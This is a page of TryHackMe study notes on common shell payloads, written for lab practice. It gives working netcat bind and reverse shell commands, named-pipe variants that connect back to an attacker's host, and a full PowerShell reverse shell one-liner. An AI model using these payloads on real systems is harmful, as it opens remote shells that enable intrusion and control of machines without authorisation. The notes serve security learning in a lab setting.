try hack me
  • what is this repo?
  • Pre Security
    • Introduction to Cyber Security
    • Linux Fundamentals
  • pre security Tools
    • gobuster
    • ping (ICMP)
    • nslookup
    • basic Linux commands
    • basic Linux operators
    • some Linux web command
    • processes
    • cron tabs (schedule)
    • Important Directories
    • basic CMD command
    • ssh
    • ftp
    • simple digital forensics commands
  • Complete Begginer
    • CVE tracking websites
    • traceroute
    • whois
    • dig
    • nmap
    • smb
    • Telnet
      • tcpdump listener & reverse shell
    • ftp
    • hydra
    • NFS
    • smtp
    • mysql
    • 🅱️Burp Suite
      • Proxy
      • target
      • intruder
      • simple XSS attack
    • OWASP top 10 : 2021
      • 1. Broken Access Control
      • 2. Cryptographic Failures
      • 3. Injection
      • 4. Insecure Design
      • 5. Security Misconfiguration
      • 6. Vulnerable and Outdated Components
      • 7. Identification and Authentication Failures
      • 8. Software and Data Integrity Failures
        • Software Integrity Failures
        • Data Integrity Failures
      • 9. Security Logging and Monitoring Failures
      • 10. Server-Side Request Forgery (SSRF)
    • file type recognition
      • How to change magic numbers
    • upload vulnerability exploiting
    • about hash
    • john the ripper
      • /etc/shadow
      • Single Crack Mode
      • Custom Rules
      • rar and zip
      • SSH Key Passwords
      • GPG/PGP
    • Encryption
      • SSH authentication
      • SSH configuration (sort of)
      • GnuPG (very basic)
    • metasploit
      • mian components
      • Scanner
      • The Metasploit Database
      • Vulnerability Scanning
      • exploiting
      • Msfvenom
      • Meterpreter>
        • Commands
        • Post-Exploitation
    • Shell
      • netcat
      • socat
      • common shell payloads
      • Next steps
    • privilege esclation
      • Exploiting Writeable /etc/passwd
      • Vi, sudo -l, GTFOBin
      • Cron tab exploitation
      • Exploiting PATH Variable
      • some checklists
      • windows
        • miscellaneous
      • Examples
        • mysql running as root
        • Weak File Permissions
        • Sudo
        • Cron Jobs
        • SUID / SGID Executables
        • Passwords & Keys
        • NFS
        • Kernel Exploits
    • file transfer between two machines
  • SQL injection
  • Google Dorking
  • Web hacking intro
    • Walking an application
    • Content Discovery(ffuf, dirb, gobuster)
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR
    • File Inclusion
Powered by GitBook
On this page
  1. Complete Begginer
  2. Shell

common shell payloads

PrevioussocatNextNext steps

Last updated 7 months ago

In some versions of netcat (including the nc.exe Windows version included with Kali at /usr/share/windows-resources/binaries, and the version used in Kali itself: netcat-traditional) there is a -e option which allows you to execute a process on connection. For example, as a listener:

nc -lvnp <PORT> -e /bin/bash

Connecting to the above listener with netcat would result in a bind shell on the target.

Equally, for a reverse shell, connecting back with nc <LOCAL-IP> <PORT> -e /bin/bash would result in a reverse shell on the target.

However, this is not included in most versions of netcat as it is widely seen to be very insecure (funny that, huh?). On Windows where a static binary is nearly always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell:

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

The following paragraph is the technical explanation for this command. It's slightly above the level of this room, so don't worry if it doesn't make much sense for now -- the command itself is what matters.

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.

A very similar command can be used to send a netcat reverse shell:

mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

This command is virtually identical to the previous one, other than using the netcat connect syntax, as opposed to the netcat listen syntax.

When targeting a modern Windows Server, it is very common to require a Powershell reverse shell, so we'll be covering the standard one-liner PSH reverse shell here.

This command is very convoluted, so for the sake of simplicity it will not be explained directly here. It is, however, an extremely useful one-liner to keep on hand:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

In order to use this, we need to replace "<IP>" and "<port>" with an appropriate IP and choice of port. It can then be copied into a cmd.exe shell (or another method of executing commands on a Windows server, such as a webshell) and executed, resulting in a reverse shell:

For other common reverse shell payloads, PayloadsAllTheThings is a repository containing a wide range of shell codes (usually in one-liner format for copying and pasting), in many different languages. It is well worth reading through the linked page to see what's available.